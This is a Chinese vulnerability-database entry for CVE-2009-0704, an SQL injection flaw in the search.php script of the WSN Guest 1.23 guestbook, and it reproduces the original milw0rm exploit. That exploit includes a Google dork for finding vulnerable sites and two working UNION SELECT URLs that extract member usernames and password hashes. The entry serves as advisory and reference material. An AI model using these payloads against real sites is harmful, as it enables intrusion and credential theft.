Webmastersite WSN Guest 'search.php' SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117191 漏洞类型 SQL注入
发布时间 2009-01-04 更新时间 2009-02-24
CVE编号 CVE-2009-0704 CNNVD-ID CNNVD-200902-520
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/7659
https://cxsecurity.com/issue/WLB-2009020251
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-520
|漏洞详情
WSNGuest是一个功能强大的访客留言薄脚本,自2003年已停止更新,最后更新为1.23版本。WSNGuest1.23版本的search.php中存在SQL注入漏洞。远程攻击者可以借助一个高级操作中的搜索参数,执行任意SQL指令。
|漏洞EXP
WSN Guest 1.23 (search.php) SQL Injection Vulnerability
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Author    : DaiMon
Homepage  : http://www.cwdaimon.com
Contact   : cwdaimon[at]gmail.com
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Script       : WSN Guest
 
Last version : 1.23
Download     : http://scripts.webmastersite.net/wsnguest/wsnguest.zip
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
###########################
Google Dork:
allinurl:wsnguest
###########################
Exploat  :

Username :
          [path]/search.php?filled=1&action=advanced&whichtype=entries&searchfields[0]=ownerid&search=999/**/union/**/select/**/name%20text,1,2,3,4,5,6,7,8,9,10,11,12,13/**/from/**/wsnguest_members
Password :
          [path]/search.php?filled=1&action=advanced&whichtype=entries&searchfields[0]=ownerid&search=999/**/union/**/select/**/password,1,2,3,4,5,6,7,8,9,10,11,12,13/**/from/**/wsnguest_members
###########################
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
###########################
Special : PARS! , Equilibrium , alpican , Cem , BlackFear , ALL Cyber-Warrior
###########################

# milw0rm.com [2009-01-04]
|参考资料

来源:XF
名称:wsnguest-search-sql-injection(47723)
链接:http://xforce.iss.net/xforce/xfdb/47723
来源:BID
名称:33097
链接:http://www.securityfocus.com/bid/33097
来源:MILW0RM
名称:7659
链接:http://www.milw0rm.com/exploits/7659